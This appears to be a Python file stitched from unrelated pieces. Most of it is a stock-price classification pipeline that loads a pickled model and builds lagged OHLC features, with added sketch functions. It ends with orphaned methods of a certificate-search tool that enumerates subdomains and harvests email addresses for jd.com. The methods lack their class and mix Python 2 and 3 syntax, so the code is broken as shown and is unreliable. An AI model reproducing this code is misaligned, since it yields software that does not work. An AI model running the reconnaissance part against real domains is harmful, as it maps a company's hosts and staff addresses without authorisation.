                logger.warning("Training x is not finite!")
            if not np.isfinite(y_train).all():
                logger.warning("Training y is not finite!")
            if not np.isfinite(X_test).all():
                logger.warning("Test x is not finite!")
            if not np.isfinite(y_test).all():
                logger.warning("Test y is not finite!")

            # Load the fitted ensemble with tuned hyperparameters
            clf = None
            with open(hyperparameters[_sym]['estimator'], 'rb') as f:
                clf = pickle.load(f)

            # Test the ensemble's performance on training and test sets
            logger.info("Classification report on train set")
            predictions1 = clf.predict(X_train)
            train_report = classification_report(y_train, predictions1, output_dict=True)
            print(classification_report(y_train, predictions1))
            logger.info("Classification report on test set")
            predictions2 = clf.predict(X_test)
            test_report = classification_report(y_test, predictions2, output_dict=True)
            print(classification_report(y_test, predictions2))
            stats = {
                'score': accuracy_score(y_train, predictions1),
                'mse': mean_squared_error(y_train, predictions1),
                'test_score': accuracy_score(y_test, predictions2),
                'test_mse': mean_squared_error(y_test, predictions2),
                'train_report': train_report,
                'test_report': test_report,
            }
            print(stats)
    print("--- end ---")
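# --- Hedged illustration (not part of the original pipeline) ---
# target_binned_price_variation is imported from elsewhere. A plausible minimal
# version that bins the percent variation into equal-frequency classes with pd.qcut
# (an assumption for illustration only, not the project's actual implementation):
import pandas as pd

def binned_price_variation_sketch(pct, n_bins=2):
    # Integer class labels 0..n_bins-1; duplicate bin edges are dropped if the data is degenerate
    return pd.qcut(pct, q=n_bins, labels=False, duplicates="drop")

# Example: binned_price_variation_sketch(features['close'].pct_change(), n_bins=2)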
def build_atsa_dataset(source_index, W=10):
    _dataset = load_dataset(source_index, return_index=True)
    index = {}
    for _sym, entry in _dataset.items():
        _df = pd.read_csv(entry['csv'], sep=',', encoding='utf-8',
                          index_col='Date', parse_dates=True)
        _target = pd.read_csv(entry['target_csv'], sep=',', encoding='utf-8',
                              index_col='Date', parse_dates=True)
        ohlcv = _df[entry['features']['ohlcv']]
        ta = _df[entry['features']['ta']]

        # Build the dataframe with base features
        ohlc = ohlcv[['open', 'high', 'low', 'close']]
        lagged_ohlc = pd.concat(
            [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)],
            axis='columns', verify_integrity=True, sort=True, join='inner')

        # Add lagged features to the dataframe
        atsa_df = pd.concat([lagged_ohlc, ta], axis='columns',
                            verify_integrity=True, sort=True, join='inner')

        # Drop the first 30 rows
        atsa_df = atsa_df[30:]

        # Save the dataframe
        atsa_df.to_csv('data/datasets/all_merged/csv/{}_atsa.csv'.format(_sym.lower()),
                       sep=',', encoding='utf-8', index=True, index_label='Date')
        atsa_df.to_excel('data/datasets/all_merged/excel/{}_atsa.xlsx'.format(_sym.lower()),
                         index=True, index_label='Date')
        # decompose_dataframe_features('all_merged', _sym+'_improved', unlagged_df)

        # Add symbol to index
        index[_sym] = {
            'csv': 'data/datasets/all_merged/csv/{}_atsa.csv'.format(_sym.lower()),
            'xls': 'data/datasets/all_merged/excel/{}_atsa.xlsx'.format(_sym.lower()),
            'target_csv': 'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()),
            'target_xls': 'data/datasets/all_merged/excel/{}_target.xlsx'.format(_sym.lower()),
            'features': {
                'atsa': [c for c in atsa_df.columns],
            }
        }
        logger.info('Saved {} in data/datasets/all_merged/'.format(_sym))
    with open('data/datasets/all_merged/index_atsa.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
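# --- Hedged illustration (not part of the original builder module) ---
# builder.make_lagged is assumed to shift the frame by `lag` rows and suffix the
# column names; a minimal pandas sketch of that idea (hypothetical, not the
# project's code):
def make_lagged_sketch(df, lag):
    lagged = df.shift(lag)  # row t now holds the values from row t - lag
    lagged.columns = ["%s_lag%d" % (c, lag) for c in df.columns]
    return lagged

# Example: pd.concat([ohlc] + [make_lagged_sketch(ohlc, i) for i in range(1, W + 1)], axis='columns')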
def run(self):
    url = self.base_url.format(domain=self.domain)
    # print url
    try:
        self.resp = http_request_get(url).content
        if self.resp:
            self.subdomains = self.get_hostnames()
            self.email = self.get_email()
            for domain in self.subdomains:
                self.domain_name.append(domain)
    except Exception as e:
        logger.error("Error in {0}: {1}".format(__file__.split('/')[-1], e))
    finally:
        logger.info("{0} found {1} domains".format(self.engine_name, len(self.domain_name)))
        return self.domain_name, self.smiliar_domain_name, self.email

def get_hostnames(self):
    rawres = parser(self.resp, self.domain)
    return rawres.hostnames()

def get_email(self):
    rawres = parser(self.resp, self.domain)
    return rawres.emails()


if __name__ == "__main__":
    x = CrtSearch("jd.com")
    print x.run()